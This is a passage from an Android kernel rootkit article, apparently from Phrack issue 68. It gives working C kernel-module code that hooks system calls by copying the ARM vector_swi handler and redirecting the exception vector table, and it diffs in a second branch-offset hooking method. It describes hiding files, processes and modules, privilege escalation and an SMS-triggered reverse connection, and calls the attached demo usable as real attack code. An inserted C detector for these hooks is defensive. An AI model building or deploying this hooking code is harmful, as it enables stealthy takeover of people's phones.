    [*]   58:   <__cr_alignment routine address referring at 0x30>

The lines marked with an asterisk are the instructions modified or added
relative to the original code. Besides the part modified so that the code
refers to the __cr_alignment function correctly, I added instructions that
save the address of the sys_call_table copy to r8 and jump back into the
original vector_swi handler function. The attack code, written as a kernel
module, follows.

    static unsigned char new_vector_swi[500];
    ...
    void make_new_vector_swi(){
        void *swi_addr=(long *)0xffff0008;
        void *vector_swi_ptr=0;
        unsigned long offset=0;
        unsigned long *vector_swi_addr=0,orig_vector_swi_addr=0;
        unsigned long add_r8_pc_addr=0;
        unsigned long ldr_ip_pc_addr=0;
        int i;

        offset=((*(long *)swi_addr)&0xfff)+8;
        vector_swi_addr=*(unsigned long *)(swi_addr+offset);
        vector_swi_ptr=swi_addr+offset; /* 0xffff0420 */
        orig_vector_swi_addr=vector_swi_addr; /* vector_swi's addr */

        /* processing __cr_alignment */
        while(vector_swi_addr++){
            if(((*(unsigned long *)vector_swi_addr)&
                0xfffff000)==0xe28f8000){
                add_r8_pc_addr=(unsigned long)vector_swi_addr;
                break;
            }
            /* get __cr_alignment's addr */
            if(((*(unsigned long *)vector_swi_addr)&
                0xfffff000)==0xe59fc000){
                offset=((*(unsigned long *)vector_swi_addr)&
                        0xfff)+8;
                ldr_ip_pc_addr=*(unsigned long *)
                               ((char *)vector_swi_addr+offset);
            }
        }

        /* creating fake vector_swi handler */
        memcpy(new_vector_swi,(char *)orig_vector_swi_addr,
               (add_r8_pc_addr-orig_vector_swi_addr));
        offset=(add_r8_pc_addr-orig_vector_swi_addr);

        for(i=0;i<offset;i+=4){
            if(((*(long *)&new_vector_swi[i])&
                0xfffff000)==0xe59fc000){
                *(long *)&new_vector_swi[i]=0xe59fc020; // ldr ip, [pc, #32]
                break;
            }
        }

        /* ldr r8, [pc, #0] */
        *(long *)&new_vector_swi[offset]=0xe59f8000;
        offset+=4;
        /* ldr pc, [pc, #0] */
        *(long *)&new_vector_swi[offset]=0xe59ff000;
        offset+=4;
        /* fake sys_call_table */
        *(long *)&new_vector_swi[offset]=hacked_sys_call_table;
        offset+=4;
        /* jmp original vector_swi's addr */
        *(long *)&new_vector_swi[offset]=(add_r8_pc_addr+4);
        offset+=4;
        /* __cr_alignment's addr */
        *(long *)&new_vector_swi[offset]=ldr_ip_pc_addr;
        offset+=4;

        /* change the address of vector_swi handler within exception vector table */
        *(unsigned long *)vector_swi_ptr=&new_vector_swi;
        return;
    }

This code gets the address of the instruction that references sys_call_table
within the vector_swi handler routine, then copies the original contents of
vector_swi up to that address into the fake vector_swi buffer.
After changing parts of the fake vector_swi so that the code refers to the
__cr_alignment function address correctly, we add the instructions that save
the address of the sys_call_table copy to r8 and jump back to the original
vector_swi handler function. Finally, hooking starts when we modify the
address of the vector_swi handler function within the exception vector table.

--[ 5.3 - Hooking techniques changing branch instruction offset

The second technique, which changes a branch instruction offset within the
exception vector table, leaves the vector_swi handler untouched and instead
changes the offset in the 4-byte instruction that is executed automatically
when the software interrupt occurs.

1. Proceed to step 4 as in section 5.1.
2. Store the address of the generated fake vector_swi handler routine in a
   specific area within the exception vector table.
3. Change the 1-byte offset of the 4-byte instruction at 0xffff0008 and store
   it back.

Compared with section 5.2, the code changes as follows.

    - *(unsigned long *)vector_swi_ptr=&new_vector_swi;
    ...
    + *(unsigned long *)(vector_swi_ptr+4)=&new_vector_swi; /* 0xffff0424 */
    ...
    + *(unsigned long *)swi_addr+=4; /* 0xe59ff410 -> 0xe59ff414 */

The exception vector table after hooking looks as follows.

    # ./coelacanth -e
    [000] ffff0000: ef9f0000 [Reset]           ; svc 0x9f0000        branch code array
    [004] ffff0004: ea0000dd [Undef]           ; b 0x380
    [008] ffff0008: e59ff414 [SWI]             ; ldr pc, [pc, #1044] ; 0x424
    [00c] ffff000c: ea0000bb [Abort-perfetch]  ; b 0x300
    [010] ffff0010: ea00009a [Abort-data]      ; b 0x280
    [014] ffff0014: ea0000fa [Reserved]        ; b 0x404
    [018] ffff0018: ea000078 [IRQ]             ; b 0x608
    [01c] ffff001c: ea0000f7 [FIQ]             ; b 0x400
    [020] Reserved
    ... skip ...
    [420] ffff0420: c003df40 [vector_swi]
    [424] ffff0424: bf0ceb5c [new_vector_swi]  ; fake vector_swi handler code

Hooking starts when the address of the fake vector_swi handler code is stored
at 0xffff0424 and the offset of the 4-byte branch instruction at 0xffff0008 is
changed so that it refers to 0xffff0424 instead.

--[ 6 - Conclusion

One more time, I thank the many pioneers for their devotion and inspiration.
I also hope that various Android rootkit researches will follow. It is a pity
that I couldn't cover all the ideas that occurred to me while writing this
paper. However, I also think that it is better to discuss the advanced and
practical techniques next time -if you like this one ;-)-.

For more information, the attached example code provides not only file &
process hiding and kernel module hiding features but also the classical
rootkit features such as admin privilege succession to a specific gid user
and process privilege changing. I referred to the Defcon 18 whitepaper of
Christian Papathanasiou and Nicholas J. Percoco for performing the reverse
connection when we receive an SMS message from an appointed phone number.

Thanks to: vangelis and GGUM for translating Korean into English.

Other than those who helped me on this paper, I'd like to thank my
colleagues, people in my graduate school and everyone who knows me.
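Each of the three modifications described in sections 4, 5.2 and 5.3 leaves a recognisable pattern in the vector page or in vector_swi. The detector below is an added example written for this page (it is not the article's earthworm code): it decodes the ARM instruction words involved and flags a redirected SWI slot, a vector_swi address outside kernel text, and the add-to-ldr patch of the syscall table load. The vector page dump, the vector_swi fragments, their base address and the kernel text range are constructed sample values.

```c
#include <stdint.h>
#include <string.h>

/* Added detector example, not the article's code: it inspects 32-bit ARM words
 * copied out of the high vector page and of vector_swi for the changes made in
 * sections 4, 5.2 and 5.3. Dumps, addresses and the text range are constructed. */

#define VECTOR_BASE     0xffff0000UL          /* high vector page */
#define SWI_VECTOR      (VECTOR_BASE + 0x008) /* word executed on a SWI */
#define VECTOR_SWI_SLOT (VECTOR_BASE + 0x420) /* normal home of vector_swi's address */
#define PC_READ(addr)   ((addr) + 8)          /* ARM: pc reads as insn address + 8 */

enum { CLEAN = 0, SWI_SLOT_MOVED = 1, HANDLER_OUTSIDE_TEXT = 2, TABLE_LOAD_PATCHED = 4 };

/* Encodings from the listings: add r8,pc,#imm = e28f8xxx; ldr r8,[pc,#imm] = e59f8xxx;
 * ldr pc,[pc,#imm] = e59ffxxx. */
static int is_add_r8_pc(uint32_t w) { return (w & 0xfffff000) == 0xe28f8000; }
static int is_ldr_r8_pc(uint32_t w) { return (w & 0xfffff000) == 0xe59f8000; }
static int is_ldr_pc_pc(uint32_t w) { return (w & 0xfffff000) == 0xe59ff000; }

/* Data-processing immediate: 8 bits rotated right by twice the rotate field. */
static uint32_t dp_imm(uint32_t w) { uint32_t r = ((w >> 8) & 0xf) * 2, i = w & 0xff;
                                     return r ? (i >> r) | (i << (32 - r)) : i; }

/* Target of a pc-relative ldr with the U bit set (true for both ldr forms above). */
uint32_t ldr_pc_target(uint32_t insn_addr, uint32_t w) { return PC_READ(insn_addr) + (w & 0xfff); }

/* Checks 5.3 and 5.2 on a 1024-word copy of the vector page; text_lo/text_hi bound
 * the kernel's own code and are supplied by the caller (an assumption). */
int check_vector_page(const uint32_t *page, uint32_t text_lo, uint32_t text_hi,
                      uint32_t *handler_out)
{
    uint32_t w = page[0x008 / 4];
    if (!is_ldr_pc_pc(w))
        return SWI_SLOT_MOVED;         /* SWI word is no longer ldr pc, [pc, #imm] */
    int flags = CLEAN;
    uint32_t slot = ldr_pc_target(SWI_VECTOR, w);
    if (slot != VECTOR_SWI_SLOT)
        flags |= SWI_SLOT_MOVED;       /* e.g. 0xffff0420 -> 0xffff0424 as in 5.3 */
    uint32_t handler = page[(slot - VECTOR_BASE) / 4];
    if (handler_out) *handler_out = handler;
    if (handler < text_lo || handler >= text_hi)
        flags |= HANDLER_OUTSIDE_TEXT; /* handler copied into module memory as in 5.2 */
    return flags;
}

/* Check 4 on nwords of vector_swi loaded at base: the table pointer must come from
 * "add r8, pc, #imm". *table_out gets the address the add computes, or the slot a
 * patched ldr fetches the pointer from. */
int check_vector_swi(const uint32_t *code, size_t nwords, uint32_t base,
                     uint32_t *table_out)
{
    for (size_t i = 0; i < nwords; i++) {
        uint32_t addr = base + 4 * (uint32_t)i;
        if (is_add_r8_pc(code[i])) {
            if (table_out) *table_out = PC_READ(addr) + dp_imm(code[i]);
            return CLEAN;
        }
        if (is_ldr_r8_pc(code[i])) {
            if (table_out) *table_out = ldr_pc_target(addr, code[i]);
            return TABLE_LOAD_PATCHED;
        }
    }
    return -1;                         /* neither form seen: dump too short */
}

/* Constructed sample vector page: clean, or hooked as in the 5.3 listing. */
void build_sample_page(uint32_t *page, int hooked)
{
    memset(page, 0, 1024 * sizeof(uint32_t));
    page[0x008 / 4] = hooked ? 0xe59ff414 : 0xe59ff410; /* ldr pc, [pc, #0x414 / #0x410] */
    page[0x420 / 4] = 0xc003df40;                        /* vector_swi, in kernel text */
    page[0x424 / 4] = 0xbf0ceb5c;                        /* new_vector_swi, module memory */
}

/* Constructed vector_swi fragments (section 4 listing), assumed loaded at 0xc003df80. */
const uint32_t clean_swi[4]  = { 0xe1a096ad, 0xe1a09689, 0xe28f8094, 0xe599c000 };
const uint32_t hooked_swi[4] = { 0xe1a096ad, 0xe1a09689, 0xe59f8080, 0xe599c000 };
```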
--[ 7 - References

[1]  "Abuse of the Linux Kernel for Fun and Profit" by halflife
     [Phrack issue 50, article 05]
[2]  "Weakening the Linux Kernel" by plaguez
     [Phrack issue 52, article 18]
[3]  "RUNTIME KERNEL KMEM PATCHING" by Silvio Cesare
     [runtime-kernel-kmem-patching.txt]
[4]  "Linux on-the-fly kernel patching without LKM" by sd & devik
     [Phrack issue 58, article 07]
[5]  "Handling Interrupt Descriptor Table for fun and profit" by kad
     [Phrack issue 59, article 04]
[6]  "trojan eraser or i want my system call table clean" by riq
     [Phrack issue 54, article 03]
[7]  "yet another article about stealth modules in linux" by riq
     ["abtrom: anti btrom" in a mail to Bugtraq]
[8]  "Saint Jude, The Model" by Timothy Lawless
     [http://prdownloads.sourceforge.net/stjude/StJudeModel.pdf]
[9]  "IA32 ADVANCED FUNCTION HOOKING" by mayhem
     [Phrack issue 58, article 08]
[10] "Android LKM Rootkit" by fred
     [http://upche.org/doku.php?id=wiki:rootkit]
[11] "This is not the droid you're looking for..." by Trustwave
     [DEFCON-18-Trustwave-Spiderlabs-Android-Rootkit-WP.pdf]

--[ 8 - Appendix: earthworm.tgz.uu

I attach demo code to demonstrate the concepts which I explained in this
paper. This code can be used as real attack code or just as proof-of-concept
code. I wish you to use this code only for your study, not for a bad purpose.
--[ EOF

Source: http://www.phrack.org/issues.html?issue=68&id=6#article